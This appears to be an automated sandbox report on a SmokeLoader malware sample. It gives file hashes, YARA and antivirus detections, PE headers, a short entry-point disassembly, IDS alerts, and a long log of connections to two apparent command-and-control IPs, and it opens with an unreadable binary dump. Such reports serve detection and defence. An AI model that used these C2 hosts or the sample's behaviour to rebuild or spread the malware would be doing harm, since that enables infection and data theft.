                                                                                                                                    Preview:...qPA30........^..?............UX..M.C...[.................(]..,............*....*...=.........+. ....................................U....W<.:U..I.....[.....M9.yp.. .>.7...o86F.[8)*.....3p.J ...s{.b+.jA... l....3|.....>.;`..v`.v.A....5]0.?...v f;..i..)....>.......;d @.....%..xPn......G?..~.1.[.j(...C..q.S|..4>.0oP..oh=tDa...`...ie..Gop..G.E.d#!...C.....+..>.`._ q..?j.B=.!. )0D.{..X.B.((f.......Y...i...E....8....@.%....=.2"...(0..:.........*.....4.........f.._.....):.O-.A?H,.!7.b!....>...Xt.X.....[......}.b!..F.c!.........7........u9Dk...i...&'c.k.T.@..v...]...........!...."..$........@@....1I. ...p.....a...@.."..i[X,,#....,..ns.....;s7..;.t.n....=\......dJ...8...2 ..E.....n...==s.......<..n.n....T..]....ps.".1.p.8L.a$(..l..\..#.}.F...!.S)t.;F.;.O..d..U..L...L....\.3...y...2e.\..x....g.e>..2..P..L...=./b2.S..U.i&.2]....{..B(.0..O!HS.N.h.C..A.1..S7w.!.f..7e..n7*.&......vS.uv..@\.....u...v..H......q..5.Z.;...DNT......H..."D..h.H+.G...(i........&...;..h.
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 37888
Entropy (8bit): 6.997703329544817
Encrypted: false
SSDEEP: 768:MgRyFAxrpRAf/KP46VjlOPBktlTVlPavMTVp:M3KxVRAf/lAjuBcTVlPavMp
MD5: 8E177D78AE583957804B5A933D6A3F1E
SHA1: EDB0A9379263C6A0A12DD77DF7D2ABE373A24722
SHA-256: 4793C4F1D490D454D761F7947B6451C07FBBC8639013F5C80B3F493E7C6CB6EB
SHA-512: 90CE292592E600B53D1E97E2CDF751D7390B246A70AA9C8051745B8029CD1DB22443D2A12307691F2EDC1573ABB6F9887D2E281853232E0C239B069889523737
Malicious: true
Yara Hits:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\hfetwhc, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 47%
Process: C:\Windows\explorer.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
Process: C:\Windows\explorer.exe
File Type: data
Category: modified
Size (bytes): 365216
Entropy (8bit): 7.999418216424842
Encrypted: true
SSDEEP: 6144:o97kCenaPxVOtG3zkZyT9jmcvE43ZAOTsIHYxm5nkwnvjfqqoRPn6IQWO7/f6zmN:odkvaPxAG3zkZ6xt84y0XHYxmVvzin6T
MD5: 328D7847146DA01756460C35A2CABB19
SHA1: 9FE1840EFB2E5EA205B593E3EC9B7159ECB12A08
SHA-256: 5F3A37FBEBB5ECB6BED1D9D222C6F6D58F5C5B09DC624DC0B571A7DDEFE8B02E
SHA-512: 861CC926E4D032001C7D45022F8BD780CCCA1DB68487B9596C02E34EBD43E72F2FD5622A0AFD7C05BA491399EDF8654E406C52976F3EBA8D0D635B0294001DEE
Malicious: false
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.997703329544817
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
File name: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe
File size: 37'888 bytes
MD5: 8e177d78ae583957804b5a933d6a3f1e
SHA1: edb0a9379263c6a0a12dd77df7d2abe373a24722
SHA256: 4793c4f1d490d454d761f7947b6451c07fbbc8639013f5c80b3f493e7c6cb6eb
SHA512: 90ce292592e600b53d1e97e2cdf751d7390b246a70aa9c8051745b8029cd1db22443d2a12307691f2edc1573abb6f9887d2e281853232e0c239b069889523737
SSDEEP: 768:MgRyFAxrpRAf/KP46VjlOPBktlTVlPavMTVp:M3KxVRAf/lAjuBcTVlPavMp
TLSH: E103D085BF90C0ADFF340AB712C5A5E19313BAEA088AE54DCB356D3B38A1D49245B49C
File Content Preview: MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......f...............I............T2............@.................................J......................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x403254
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp: 0x66ED9F87 [Fri Sep 20 16:15:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 1
OS Version Minor: 0
File Version Major: 1
File Version Minor: 0
Subsystem Version Major: 1
Subsystem Version Minor: 0
Import Hash:
Instruction
call 00007FF701228EE5h
jne 00007FF701228EE8h
je 00007FF701228EE6h
pop edi
mov edx, EB5BB25Ch
or cl, al
sub ebx, 00003259h
jmp 00007FF701228EE7h
mov ch, bl
cmc
enter 748Ah, 08h
jne 00007FF701228EE8h
mov byte ptr [esi+eax*8-41h], cl
push eax
xchg eax, edx
push 00000030h
jne 00007FF701228EE7h
je 00007FF701228EE5h
xor bh, byte ptr [ecx-22h]
mov edx, dword ptr [esp]
add esp, 04h
jmp 00007FF701228EE8h
add al, 29h
shr bl, 00000005h
and ch, bl
stc
add al, 22h
jmp 00007FF701228EE7h
or byte ptr [edx], ch
or al, 72h
jecxz 00007FF701228F46h
add eax, dword ptr [edx]
je 00007FF701228EE7h
jne 00007FF701228EE5h
pop ebx
push esp
and al, FFh
mov al, A4h
add byte ptr [eax], al
add byte ptr [ebp+04h], dh
je 00007FF701228EE4h
popfd
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Section: .text
Virtual Address: 0x1000
Virtual Size: 0x9194
Raw Size: 0x9200
MD5: 918930a2d38bb1ceb8f83a1f60c1f784
Xored PE: False
ZLIB Complexity: 0.771564640410959
File Type: data
Entropy: 7.0440254923492915
Characteristics: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Timestamp                        SID      Signature                                         Severity  Source IP       Source Port  Dest IP         Dest Port  Protocol
2024-10-06T21:26:02.042526+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49742        198.54.117.242  80         TCP
2024-10-06T21:26:02.042526+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49730        194.87.189.87   80         TCP
2024-10-06T21:26:02.042526+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49738        194.87.189.87   80         TCP
2024-10-06T21:26:02.042526+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49714        194.87.189.87   80         TCP
2024-10-06T21:26:02.042526+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49718        198.54.117.242  80         TCP
2024-10-06T21:26:02.042526+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49747        194.87.189.87   80         TCP
2024-10-06T21:27:36.683173+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49734        198.54.117.242  80         TCP
2024-10-06T21:27:37.689520+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49746        194.87.189.87   80         TCP
2024-10-06T21:27:37.879552+0200  2829848  ETPRO MALWARE SmokeLoader encrypted module (3)    2         194.87.189.87   80           192.168.2.8     49746      TCP
2024-10-06T21:28:16.092832+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49748        194.87.189.87   80         TCP
2024-10-06T21:28:56.074082+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49749        194.87.189.87   80         TCP
2024-10-06T21:29:11.964748+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49750        194.87.189.87   80         TCP
2024-10-06T21:29:30.230373+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49751        194.87.189.87   80         TCP
2024-10-06T21:29:49.168031+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49752        194.87.189.87   80         TCP
2024-10-06T21:30:06.043036+0200  2039103  ET MALWARE Suspected Smokeloader Activity (POST)  1         192.168.2.8     49753        194.87.189.87   80         TCP
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Oct 6, 2024 21:26:30.206715107 CEST  49714        80         192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.211478949 CEST  80           49714      194.87.189.87  192.168.2.8
Oct 6, 2024 21:26:30.211853981 CEST  49714        80         192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.211853981 CEST  49714        80         192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.211853981 CEST  49714        80         192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.216645956 CEST  80           49714      194.87.189.87  192.168.2.8
Oct 6, 2024 21:26:30.216753960 CEST  80           49714      194.87.189.87  192.168.2.8
Oct 6, 2024 21:26:30.216866016 CEST  80           49714      194.87.189.87  192.168.2.8
Oct 6, 2024 21:26:30.220467091 CEST  49715        443        192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.220493078 CEST  443          49715      194.87.189.87  192.168.2.8
Oct 6, 2024 21:26:30.220693111 CEST  49715        443        192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.221026897 CEST  49715        443        192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.221044064 CEST  443          49715      194.87.189.87  192.168.2.8
Oct 6, 2024 21:26:30.242089987 CEST  443          49715      194.87.189.87  192.168.2.8
Oct 6, 2024 21:26:30.242296934 CEST  49715        443        192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.242296934 CEST  49715        443        192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.242795944 CEST  49716        443        192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.242842913 CEST  443          49716      194.87.189.87  192.168.2.8
Oct 6, 2024 21:26:30.242923975 CEST  49716        443        192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.243357897 CEST  49716        443        192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.243377924 CEST  443          49716      194.87.189.87  192.168.2.8
Oct 6, 2024 21:26:30.263519049 CEST  443          49716      194.87.189.87  192.168.2.8
Oct 6, 2024 21:26:30.263633013 CEST  49716        443        192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.263700962 CEST  49716        443        192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.263720036 CEST  443          49716      194.87.189.87  192.168.2.8
Oct 6, 2024 21:26:30.264183998 CEST  49717        443        192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.264215946 CEST  443          49717      194.87.189.87  192.168.2.8
Oct 6, 2024 21:26:30.268971920 CEST  49717        443        192.168.2.8    194.87.189.87
Oct 6, 2024 21:26:30.269850016 CEST  49717        443        192.168.2.8    194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.269870043 CEST44349717194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.270111084 CEST49717443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.537875891 CEST4971880192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.542923927 CEST8049718198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.543009996 CEST4971880192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.543196917 CEST4971880192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.543196917 CEST4971880192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.548110008 CEST8049718198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.548338890 CEST8049718198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.548448086 CEST8049718198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.551330090 CEST49719443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.551368952 CEST44349719198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.551436901 CEST49719443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.551748037 CEST49719443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.551769018 CEST44349719198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.557981968 CEST49715443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:26:30.558001995 CEST44349715194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.579575062 CEST44349719198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.579646111 CEST49719443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.579684019 CEST49719443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.579700947 CEST44349719198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.580177069 CEST49720443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.580188036 CEST44349720198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.580244064 CEST49720443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.580823898 CEST49720443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.580832958 CEST44349720198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.592109919 CEST44349720198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.594810963 CEST49721443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.594844103 CEST44349721198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.594921112 CEST49721443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.595076084 CEST49721443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:26:30.595138073 CEST44349721198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:26:30.595226049 CEST49721443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:35.636430025 CEST4973080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.783150911 CEST8049730194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.783216953 CEST4973080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.783380985 CEST4973080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.783402920 CEST4973080192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.789840937 CEST8049730194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.789850950 CEST8049730194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.790572882 CEST8049730194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.801904917 CEST49731443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.801929951 CEST44349731194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.801986933 CEST49731443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.802416086 CEST49731443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.802432060 CEST44349731194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.819689035 CEST44349731194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.820141077 CEST49732443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.820163965 CEST44349732194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.820219994 CEST49732443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.820691109 CEST49732443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.820708036 CEST44349732194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.831186056 CEST44349732194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.831588984 CEST49733443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.831621885 CEST44349733194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.831674099 CEST49733443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.831979036 CEST49733443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:35.832011938 CEST44349733194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:35.832053900 CEST49733443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.069386959 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.074251890 CEST8049734198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.074424982 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.074981928 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.075068951 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.079790115 CEST8049734198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.079849958 CEST8049734198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.642191887 CEST8049734198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.647181034 CEST49735443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.647244930 CEST44349735198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.647794962 CEST49735443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.648139000 CEST49735443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.648152113 CEST44349735198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.668428898 CEST44349735198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.668494940 CEST49735443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.668538094 CEST49735443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.668550968 CEST44349735198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.669302940 CEST49736443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.669343948 CEST44349736198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.671288967 CEST49736443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.673666954 CEST49736443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.673687935 CEST44349736198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.683172941 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.684663057 CEST44349736198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.685252905 CEST49737443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.685286045 CEST44349737198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.685338020 CEST49737443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.685992956 CEST49737443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.686029911 CEST44349737198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.686630964 CEST49737443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.707792044 CEST4973880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.712644100 CEST8049738194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.712712049 CEST4973880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.712831020 CEST4973880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.712853909 CEST4973880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.717600107 CEST8049738194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.717632055 CEST8049738194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.717751026 CEST8049738194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.739427090 CEST49739443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.739465952 CEST44349739194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.739659071 CEST49739443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.740087986 CEST49739443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.740102053 CEST44349739194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.761718035 CEST44349739194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.761847019 CEST49739443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.761847019 CEST49739443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.762095928 CEST49740443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.762119055 CEST44349740194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.762197971 CEST49740443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.762497902 CEST49740443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.762511969 CEST44349740194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.773705959 CEST44349740194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.774041891 CEST49741443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.774066925 CEST44349741194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.774120092 CEST49741443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.774277925 CEST49741443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.774374008 CEST44349741194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.774544954 CEST49741443192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:36.776262045 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.777013063 CEST4974280192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.782090902 CEST8049742198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.782123089 CEST8049734198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.782206059 CEST4973480192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.782340050 CEST4974280192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.783082962 CEST4974280192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.783169031 CEST4974280192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.787662029 CEST8049742198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.787949085 CEST8049742198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.787997961 CEST4974280192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.788054943 CEST4974280192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.788077116 CEST8049742198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.790358067 CEST49743443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.790378094 CEST44349743198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.790441036 CEST49743443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.790721893 CEST49743443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.790735960 CEST44349743198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.793024063 CEST8049742198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.793054104 CEST8049742198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.801812887 CEST44349743198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:36.802324057 CEST49744443192.168.2.8198.54.117.242
                                                                                                                                    Oct 6, 2024 21:27:36.802345991 CEST44349744198.54.117.242192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.979279995 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.982197046 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.982233047 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.982242107 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.982274055 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.982299089 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.984961987 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.984980106 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.984989882 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.985044003 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.988235950 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.988277912 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.988279104 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.988289118 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.988322020 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.990995884 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.991020918 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.991030931 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.991061926 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.993989944 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.994013071 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.994021893 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.994043112 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.994062901 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.996958971 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.997021914 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.997031927 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.997070074 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.001096010 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.001152992 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.001213074 CEST8049746194.87.189.87192.168.2.8
